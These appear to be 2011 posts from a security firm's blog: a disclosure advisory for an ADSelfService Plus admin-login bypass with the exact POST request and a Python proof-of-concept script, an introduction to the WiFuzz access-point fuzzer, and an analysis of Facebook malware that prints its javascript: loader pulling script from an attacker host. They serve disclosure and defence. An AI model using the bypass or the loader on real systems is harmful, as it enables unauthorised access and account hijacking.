j_username=user&j_password=pass&domainName=domain&DIGEST=captcha&AUTHRULE_NAME=ADAuthenticator&domainAuthen=true

However, due to a software defect, if a malicious user tries to log in as the "admin" user and adds to the POST body an additional parameter named "resetUnLock" with value "true", the application skips the password check (i.e., any password can be supplied and the login succeeds).

As an example, an attacker can issue the following POST request to authenticate as the "admin" user:

POST /j_security_check HTTP/1.1
Host: ...
Content-Length: ...

j_username=admin&j_password=any&domainName=domain&DIGEST=captcha&AUTHRULE_NAME=ADAuthenticator&domainAuthen=true&resetUnLock=true
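For testing purposes, the whole request can be reproduced with a short script. A sketch using the Python requests library; the host, domain and captcha values are placeholders:

import requests

BASE = "http://target.example"  # placeholder host

resp = requests.post(BASE + "/j_security_check", data={
    "j_username": "admin",
    "j_password": "any",               # ignored because of the flaw
    "domainName": "domain",            # placeholder
    "DIGEST": "captcha",               # placeholder
    "AUTHRULE_NAME": "ADAuthenticator",
    "domainAuthen": "true",
    "resetUnLock": "true",             # the parameter that skips the password check
})
print(resp.status_code)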


Remediation
Zoho included a fix for this issue in ADSelfService Plus Build 4522. Emaze would like to thank D. Ashok Kumar, of the ManageEngine ADSelfService Plus team, for having coordinated the vulnerability handling process.

Report Timeline
  • 26/08/2011 - Initial vendor contact. Publication date set to September 20th, 2011.
  • 02/09/2011 - Vendor replied, asking for a phone contact number to discuss the details of the issue.
  • 03/09/2011 - Emaze asked to keep all the communication through e-mail, in order to keep track of the whole conversation. Publication date delayed to September 24th, 2011.
  • 06/09/2011 - Zoho answered, providing a GPG key to secure the communication.
  • 08/09/2011 - Emaze replied with the vulnerability details.
  • 15/09/2011 - Emaze asked Zoho for a status update on the vulnerability handling process.
  • 15/09/2011 - Zoho confirmed the vulnerability has been fixed, and the patch will be included in the upcoming ADSelfService Plus Build 4522 release. According to Zoho, the new product build should be released "in a couple of weeks".
  • 15/09/2011 - Emaze replied, asking whether the current publication date (September 24th) was still appropriate.
  • 20/09/2011 - Zoho asked to move the publication date after the first week of October.
  • 21/09/2011 - Emaze set a new publication date to October 7th, 2011.
  • 10/10/2011 - Zoho released ADSelfService Plus Build 4522, which fixes the security vulnerability.
  • 11/10/2011 - Public disclosure.

Copyright
Copyright(c) Emaze Networks S.p.A. 2011, All rights reserved worldwide. Permission is hereby granted to redistribute this advisory, providing that no changes are made and that the copyright notices and disclaimers remain intact.

Emaze Networks has updated ipLegion, its vulnerability assessment platform, to check for this vulnerability. Contact info@emaze.net for more information about ipLegion.

Disclaimer
Emaze Networks S.p.A. is not responsible for the misuse of the information provided in our security advisories. These advisories are a service to the professional security community. There are NO WARRANTIES with regard to this information. Any application or distribution of this information constitutes acceptance AS IS, at the user's own risk. This information is subject to change without notice.

Testing wireless access points

Nowadays, wireless devices are ubiquitous. Despite the widespread diffusion of this technology, the security of wireless systems still needs thorough scrutiny, particularly at the 802.11 network stack level.

Today we introduce WiFuzz, a very simple but nifty tool for testing wireless access point (AP) devices. WiFuzz generates "fuzzy" 802.11 network packets to trigger corner-case errors in the AP 802.11 stack.


How does it work?
WiFuzz is written entirely in Python and leverages the Scapy library for packet generation. To use WiFuzz, the network card driver must support traffic injection. Moreover, the Wi-Fi interface must be put into "monitor mode"; as an example, with my NIC these commands do the job:
$ sudo rmmod iwlagn
$ sudo modprobe iwlagn
$ sudo ifconfig wlan0 down
$ sudo iwconfig wlan0 mode monitor
$ sudo ifconfig wlan0 up
Only two mandatory parameters are required before starting to fuzz: the fuzzer type and the SSID of the target AP.

WiFuzz is somewhat a "stateful" fuzzer: depending on the chosen fuzzer type, it first moves to a suitable 802.11 state before starting to fuzz the AP. As an example, 802.11 Association requests are fuzzed with the "assoc" fuzzer, which first moves to the "probed" state, then authenticates with the AP ("authenticated" state), and finally starts to fuzz Association packets. The available fuzzers are visible in the following screenshot.

WiFuzz help screen
Fortunately, state transitions are handled transparently by the tool, so you can just forget about them ;-) For example, to fuzz the AP identified by the "TestMe" SSID, the following syntax can be used:
$ sudo python wifuzz.py -s TestMe assoc
To detect AP crashes, WiFuzz periodically listens for Beacon frames from the target access point: if no Beacon is received, WiFuzz assumes the target has crashed, and a PCAP test case is generated to reproduce the crash. Test cases can be replayed using the wireply.py utility.
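The beacon-based liveness check is easy to replicate with Scapy. A minimal sketch of the idea, assuming a monitor-mode interface named wlan0:

from scapy.all import sniff, Dot11Beacon, Dot11Elt

def ap_is_alive(ssid, iface="wlan0", timeout=10):
    # True if a beacon advertising `ssid` is sniffed within `timeout` seconds.
    def match(pkt):
        return pkt.haslayer(Dot11Beacon) and pkt[Dot11Elt].info == ssid.encode()
    return len(sniff(iface=iface, timeout=timeout, lfilter=match, count=1)) > 0

print(ap_is_alive("TestMe"))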

Use case
Here is a brief example of WiFuzz in action. In this scenario, we used WiFuzz to test the access point with SSID "TestMe".

$ sudo python wifuzz.py -s TestMe auth
Wed Sep 28 10:38:36 2011 {MAIN} Target SSID: TestMe; Interface: wlan0; Ping timeout: 60; PCAP directory: /dev/shm; Test mode? False; Fuzzer(s): auth;
Wed Sep 28 10:38:36 2011 {WIFI} Waiting for a beacon from SSID=[TestMe]
Wed Sep 28 10:38:36 2011 {WIFI} Beacon from SSID=[TestMe] found (MAC=[00:aa:bb:cc:dd:ee])
Wed Sep 28 10:38:36 2011 {WIFI} Starting fuzz 'auth'
Wed Sep 28 10:38:36 2011 {WIFI} [R00001] Sending packets 1-100
Wed Sep 28 10:38:50 2011 {WIFI} [R00001] Checking if the AP is still up...
Wed Sep 28 10:38:50 2011 {WIFI} Waiting for a beacon from SSID=[TestMe]
Wed Sep 28 10:38:50 2011 {WIFI} Beacon from SSID=[TestMe] found (MAC=[00:aa:bb:cc:dd:ee])
Wed Sep 28 10:38:50 2011 {WIFI} [R00002] Sending packets 101-200
Wed Sep 28 10:39:04 2011 {WIFI} [R00002] Checking if the AP is still up...
Wed Sep 28 10:39:04 2011 {WIFI} Waiting for a beacon from SSID=[TestMe]
Wed Sep 28 10:39:04 2011 {WIFI} Beacon from SSID=[TestMe] found (MAC=[00:aa:bb:cc:dd:ee])
Wed Sep 28 10:39:04 2011 {WIFI} [R00003] Sending packets 201-300
Wed Sep 28 10:39:18 2011 {WIFI} [R00003] Checking if the AP is still up...
Wed Sep 28 10:39:18 2011 {WIFI} Waiting for a beacon from SSID=[TestMe]
Wed Sep 28 10:39:19 2011 {WIFI} Beacon from SSID=[TestMe] found (MAC=[00:aa:bb:cc:dd:ee])
Wed Sep 28 10:39:19 2011 {WIFI} [R00004] Sending packets 301-400
Wed Sep 28 10:39:42 2011 {WIFI} [R00004] recv() timeout exceeded! (packet #325)
Wed Sep 28 10:39:42 2011 {WIFI} [R00004] Checking if the AP is still up...
Wed Sep 28 10:39:42 2011 {WIFI} Waiting for a beacon from SSID=[TestMe]
Wed Sep 28 10:40:42 2011 {WIFI} [!] The AP does not respond anymore. Latest test-case has been written to '/dev/shm/wifuzz-eK97nb.pcap'

The AP has been tested using the "auth" module (802.11 Authentication Request fuzzer). In this case, the AP has crashed after roughly 325 packets, and a PCAP file with all the generated packets since the beginning of the last fuzz round has been written to "/dev/shm/wifuzz-eK97nb.pcap".

Conclusions
We use WiFuzz in our daily activities, and it has led to the identification of some interesting wireless bugs. The tool is available here, and it is released under the GPL license, so feel free to contribute!

Facebook malware on the rise

Today, many Italian users found on their Facebook profiles some links similar to the one depicted below. For non-Italian speakers, the text can be translated as "Facebook security check. To see the video, follow these steps".


When the "Continue" button is pressed, the following form is displayed:


Here is the translation:
  1. Select the address bar
  2. Press 'j' on the keyboard
  3. Press (CTRL+V) and press ENTER
What happens under the hood is quite simple, and similar to other Facebook malware. The link posted on the victim's Facebook profile refers to a malicious SWF file (hxxp://www.cowboysaliensstreaming.com/tag/test.swf) which displays the two dialogs depicted above. Once executed, the Flash applet also fills the clipboard with the text:

avascript:(a=(b=document).createElement(\'script\')).src=\'hxxp://www.cowboysaliensstreaming.com/tag/fb.php\',b.body.appendChild(a);void(0)

Then, the SWF asks the user to click on the address bar, press 'j' and then CTRL+V. The result is that the following text is copied in the address bar:

javascript:(a=(b=document).createElement(\'script\')).src=\'hxxp://www.cowboysaliensstreaming.com/tag/fb.php\',b.body.appendChild(a);void(0)

As a consequence, a piece of Javascript code is executed that can interact with the Facebook DOM document. The Javascript code fragment creates a new HTML <script> element which loads the resource stored at hxxp://www.cowboysaliensstreaming.com/tag/fb.php. The malicious resource spreads the malware to the Facebook friends of the victim, and eventually displays some spam links:


For those who are interested, a copy of the malicious Javascript code can be found here.

So nothing is really new with this sample: the same techniques have been used several times in the past. What is astonishing is the number of victims: although Internet users should by now be familiar with these trivial threats, more and more (mostly Italian) Facebook users have carefully followed the malware's instructions, without even wondering why they should ever copy a strange string into the address bar to watch a YouTube video.